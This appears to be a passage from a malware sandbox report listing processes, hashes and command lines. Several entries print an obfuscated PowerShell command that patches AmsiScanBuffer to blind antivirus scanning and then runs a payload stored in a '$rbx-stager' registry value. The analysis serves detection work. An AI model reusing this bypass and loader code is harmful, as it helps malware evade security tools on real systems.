                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                        Imagebase:0x7ff79f7e0000
                                                                                                                                                        File size:468'120 bytes
                                                                                                                                                        MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:53
                                                                                                                                                        Start time:18:24:52
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:54
                                                                                                                                                        Start time:18:24:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:55
                                                                                                                                                        Start time:18:24:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:56
                                                                                                                                                        Start time:18:24:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:57
                                                                                                                                                        Start time:18:24:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$yNoIOiWMAQGoVU=$iKNksxDtTNKAc.GetMethod(''+'G'+'e'+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+'d'+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ldjQKaGUcclhcmhFUiK=fuLUlHVbHHgj @([String])([IntPtr]);$OGRkrpCaviqYlLkTxWpljP=fuLUlHVbHHgj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JbgpKYFPFWJ=$iKNksxDtTNKAc.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Mo'+'d'+''+[Char](117)+''+'l'+''+'e'+'H'+'a'+''+'n'+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+''+'l'+''+'l'+'')));$PQfPIIgelMLvUB=$yNoIOiWMAQGoVU.Invoke($Null,@([Object]$JbgpKYFPFWJ,[Object]('Lo'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$GDgGvFoXzgYhofixb=$yNoIOiWMAQGoVU.Invoke($Null,@([Object]$JbgpKYFPFWJ,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$DcSwIDH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PQfPIIgelMLvUB,$ldjQKaGUcclhcmhFUiK).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$rcGSxwaaaaKUimwsu=$yNoIOiWMAQGoVU.Invoke($Null,@([Object]$DcSwIDH,[Object](''+'A'+'m'+[Char](115)+'i'+'S'+'c'+'a'+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$QQMIPunPos=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GDgGvFoXzgYhofixb,$OGRkrpCaviqYlLkTxWpljP).Invoke($rcGSxwaaaaKUimwsu,[uint32]8,4,[ref]$QQMIPunPos);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rcGSxwaaaaKUimwsu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GDgGvFoXzgYhofixb,$OGRkrpCaviqYlLkTxWpljP).Invoke($rcGSxwaaaaKUimwsu,[uint32]8,0x20,[ref]$QQMIPunPos);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'r'+[Char](98)+''+[Char](120)+'-'+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:58
                                                                                                                                                        Start time:18:24:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:59
                                                                                                                                                        Start time:18:25:03
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:60
                                                                                                                                                        Start time:18:25:03
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:61
                                                                                                                                                        Start time:18:25:03
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:62
                                                                                                                                                        Start time:18:25:03
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:63
                                                                                                                                                        Start time:18:25:03
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:64
                                                                                                                                                        Start time:18:25:03
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](116)+'at'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ivpgsCMtihnowdNIBeH=kveHNQwSSGcg @([String])([IntPtr]);$jwUlbRJyRtiCsTvojnOrQR=kveHNQwSSGcg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mpyIpGuEmdK=$gFfWslPcsIxEF.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+'a'+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$scqjgRcUiQSTBu=$xRDavNIGnzLLon.Invoke($Null,@([Object]$mpyIpGuEmdK,[Object](''+[Char](76)+''+'o'+'adL'+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$CTojssOdwpNmEymGb=$xRDavNIGnzLLon.Invoke($Null,@([Object]$mpyIpGuEmdK,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$ssgLTbT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($scqjgRcUiQSTBu,$ivpgsCMtihnowdNIBeH).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+'.d'+'l'+''+[Char](108)+'');$EVtyXOreozsddqFlq=$xRDavNIGnzLLon.Invoke($Null,@([Object]$ssgLTbT,[Object](''+'A'+'m'+'s'+''+'i'+''+[Char](83)+''+'c'+'a'+'n'+''+[Char](66)+''+'u'+'f'+'f'+''+'e'+''+[Char](114)+'')));$vxbtwyzgyD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CTojssOdwpNmEymGb,$jwUlbRJyRtiCsTvojnOrQR).Invoke($EVtyXOreozsddqFlq,[uint32]8,4,[ref]$vxbtwyzgyD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EVtyXOreozsddqFlq,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CTojssOdwpNmEymGb,$jwUlbRJyRtiCsTvojnOrQR).Invoke($EVtyXOreozsddqFlq,[uint32]8,0x20,[ref]$vxbtwyzgyD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+'x'+'-'+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:65
                                                                                                                                                        Start time:18:25:03
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:66
                                                                                                                                                        Start time:18:25:04
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'i'+[Char](99)+''+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vKwAkflJKGpUwNhZmaw=YrWHxoHyNMxl @([String])([IntPtr]);$qJXsDxxmTbuQfbUlnZoHlQ=YrWHxoHyNMxl 